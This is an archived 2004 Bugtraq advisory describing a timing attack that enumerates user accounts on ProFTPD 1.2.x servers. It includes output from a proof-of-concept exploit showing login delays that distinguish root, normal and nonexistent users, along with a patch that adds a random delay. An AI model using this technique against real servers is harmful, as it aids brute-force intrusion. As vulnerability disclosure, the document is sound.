lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 15 Oct 2004 18:00:51 +0200
From: LSS Security <exposed@....hr>
To: bugtraq@...urityfocus.com
Subject: ProFTPD 1.2.x remote users enumeration bug



			LSS Security Advisory #LSS-2004-10-2

			       http://security.lss.hr
			   
			   	
---

Title		   : ProFTPD 1.2.x remote users enumeration bug
Advisory ID	   : LSS#2004-10-2
Date		   : October 14th, 2004
Advisory URL:	   : http://security.lss.hr/index.php?page=details&ID=LSS-2004-10-02
Impact		   : Remote users enumeration
Risk level  	   : Low
Vulnerability type : Remote
Vendors contacted  : Proftpd.org, 09.09.2004.

---



==[ Overview

ProFTPD is a very popular FTP (File Transfer Protocol) server, included by
default in many Linux/Unix distributions. LSS Security Team discovered a
remote users enumeration bug in ProFTPD, which can be used to identify and
differentiate valid user accounts on the remote system. Vulnerabilities 
similar to the one described here have already been discovered on many 
other network servers.



==[ Vulnerability

It is possible to determine which user names are valid, which are special, 
and which ones do not exist on the remote system. That is accomplished by 
code execution path timing analysis attack at the ProFTPD login procedure.

There is a very small (but significant) difference in time delay of code 
execution path between valid and non-valid user names. That can be used 
to remotely determine the difference between existent and non-existent 
users.

The time delay can be measured by using a simple FTP client that will
calculate elapsed time between 'USER' command sent by client, and the 
server response. Because of the very short response period, elapsed time
should be measured in microseconds.
LSS has developed simple PoC exploit that is presented here:

Special user - root:

[ljuranic@...na ljuranic]$ ./a.out xxx.xxx.xxx.xxx root

Proftpd remote users discovery exploit
      Coded by Leon / LSS Security
>-------------------------------------<
Login time:  720 | 493 | 446 | 444 | 443 | 441 | 441 | 442 |
Avrg: 483
.....
Login time:  732 | 462 | 445 | 442 | 445 | 442 | 442 | 442 |
Avrg: 481
.....
Login time:  725 | 470 | 450 | 447 | 446 | 447 | 446 | 446 |
Avrg: 484

Average login time for the special user (root) is about 480 usec. All other
special users will have approximately the same login time delay.


Normal user - ljuranic:

[ljuranic@...na ljuranic]$ ./a.out xxx.xxx.xxx.xxx ljuranic
Proftpd remote users discovery exploit
      Coded by Leon / LSS Security
>-------------------------------------<
Login time:  885 | 634 | 617 | 615 | 614 | 613 | 615 | 738 |
Avrg: 666
.....
Login time:  892 | 701 | 623 | 617 | 618 | 618 | 618 | 616 |
Avrg: 662
.....
Login time:  927 | 658 | 622 | 619 | 617 | 616 | 617 | 616 |
Avrg: 661

Average login time for normal user (ljuranic) is about 660 usec. All other 
normal users will have approximately the same login delay.


Non existent user - non-existent:

[ljuranic@...na ljuranic]$ ./a.out xxx.xxx.xxx.xxx non-existent
Proftpd remote users discovery exploit
      Coded by Leon / LSS Security
>-------------------------------------<
Login time:  656 | 417 | 401 | 398 | 398 | 395 | 396 | 397 |
Avrg: 432
.....
Login time:  647 | 418 | 401 | 400 | 400 | 399 | 399 | 399 |
Avrg: 432
.....
Login time:  647 | 413 | 401 | 400 | 400 | 400 | 400 | 400 |
Avrg: 432

Average login time for non existent user is about 430 usec.

The time difference between three types of user accounts is evident, making
it easy to determine other valid, non-valid, and special user accounts.
This vulnerability can be used to launch more efficient brute-force 
attacks.



===[ Affected versions

Vulnerability was successfully tested on ProFTPD versions 1.2.8 and 1.2.10,
but other versions may be vulnerable as well. Test server was placed on the
local Ethernet 10/100 network, and tests were conducted over the Internet.



===[ Fix

Pseudo-random usleep() at the login procedure that will obfuscate time leak. 
Something like this:

proftpd-1.2.10/modules/mod_auth.c
1867a1868,1877
>   {
>     unsigned int randa;
>     struct timeval tv;
>     struct timezone tz;
>     gettimeofday (&tv, &tz);
>     srand(tv.tv_usec);
>     randa = rand() % 20000;
>     usleep(randa);
>    }
>

After this simple patch is applied, it is impossible to tell which users do
and don't exist:

[ljuranic@...na ljuranic]$ ./a.out xxx.xxx.xxx.xxx root
Proftpd remote users discovery exploit
      Coded by Leon / LSS Security
>-------------------------------------<
Login time: 14954 | 29854 | 19939 | 20024 | 20044 | 19931 | 29988 | 30009|
Avrg: 23092
.....
Login time: 11677 | 19802 | 20042 | 29941 | 20093 | 19899 | 20005 | 30015|
Avrg: 21434
.....
Login time: 18027 | 20062 | 19877 | 20006 | 20050 | 30049 | 19906 | 29989|
Avrg: 22245



===[ PoC Exploit

http://security.lss.hr/Poc/



===[ Credits

This vulnerability was found by Leon Juranic (ljuranic@....hr).



===[ LSS Security Contact
 
 LSS Security Team, <eXposed by LSS>
 
 WWW    : http://security.lss.hr
 E-mail : security@....hr
 Tel	: +385 1 6129 775

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ